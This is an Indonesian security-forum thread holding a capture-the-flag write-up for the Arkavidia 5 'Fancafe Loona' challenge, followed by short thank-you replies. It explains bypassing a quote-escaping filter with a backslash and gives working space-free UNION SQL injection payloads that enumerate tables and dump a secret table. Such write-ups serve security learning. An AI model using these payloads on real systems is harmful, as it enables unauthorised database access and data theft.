+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Web Attack (https://www.indonesianbacktrack.or.id/forum/forum-181.html)
+--- Thread: Share WRITEUP ARKAVIDIA 5: FANCAFE LOONA (/thread-7338.html)
WRITEUP ARKAVIDIA 5: FANCAFE LOONA - abdilahrf - 02-14-2019
Diberikan website menggunakan go yang mempunyai fitur untuk mencari post dan melihat detail dari post, dengan route sebagai berikut.
![[Image: Capture.PNG]](https://abdilahrf.github.io/uploads/Capture.PNG)
Kita juga diberikan akses terhadap source codenya yang bisa digunakan untuk memudahkan kita menemukan entrypoint eksploitasi pada aplikasi tersebut, dan ditemukan aplikasi sudah mengimplementasikan proteksi terhadap serangan SQL Injection.
![[Image: Capture-1.PNG]](https://abdilahrf.github.io/uploads/Capture-1.PNG)
Namun sayang nya filter tersebut belum cukup untuk mengamankan dari serangan SQL Injection karena dapat di bypass dengan memanfaatkan backslash \ .
Quote:’ => \’
\’ => \\’
Dengan menggunakan \' kita dapat melakukan bypass terhadap filter tersebut, kemudian lakukan union dengan normal namun tanpa menggunakan spasi. Menggunakan payload berikut kita dapat memunculkan list table yang ada melalui information_schema.
Code:
TESTING\')and(1)=(0)union(select(1),1,1,1,table_name,1,(1)from(information_schema.tables)where(table_schema)!=(0x696e666f726d6174696f6e5f736368656d61))#![[Image: Capture-2.PNG]](https://abdilahrf.github.io/uploads/Capture-2.PNG)
Code:
TESTING\')and(1)=(0)union(select(1),1,1,1,flag,1,(1)from(secret))#![[Image: Capture-3.PNG]](https://abdilahrf.github.io/uploads/Capture-3.PNG)
RE: WRITEUP ARKAVIDIA 5: FANCAFE LOONA - cacadosman - 02-14-2019
Wah mantep om, gk kepikiran pake union.
Pas itu cm nyoba payload asd\')||1=1# tp ttp msh error
RE: WRITEUP ARKAVIDIA 5: FANCAFE LOONA - Kresna - 02-14-2019
mantul bro ! thanks for sharing
RE: WRITEUP ARKAVIDIA 5: FANCAFE LOONA - hamdan_zenith - 02-14-2019
mantap kali abdilah,,,
makasih ilmunyaa om,,
RE: WRITEUP ARKAVIDIA 5: FANCAFE LOONA - wahyuardan - 02-15-2019
thanks bro sharingnya, ijin belajar
RE: WRITEUP ARKAVIDIA 5: FANCAFE LOONA - T-Rex - 02-24-2019
Thanks Mank For shraingnya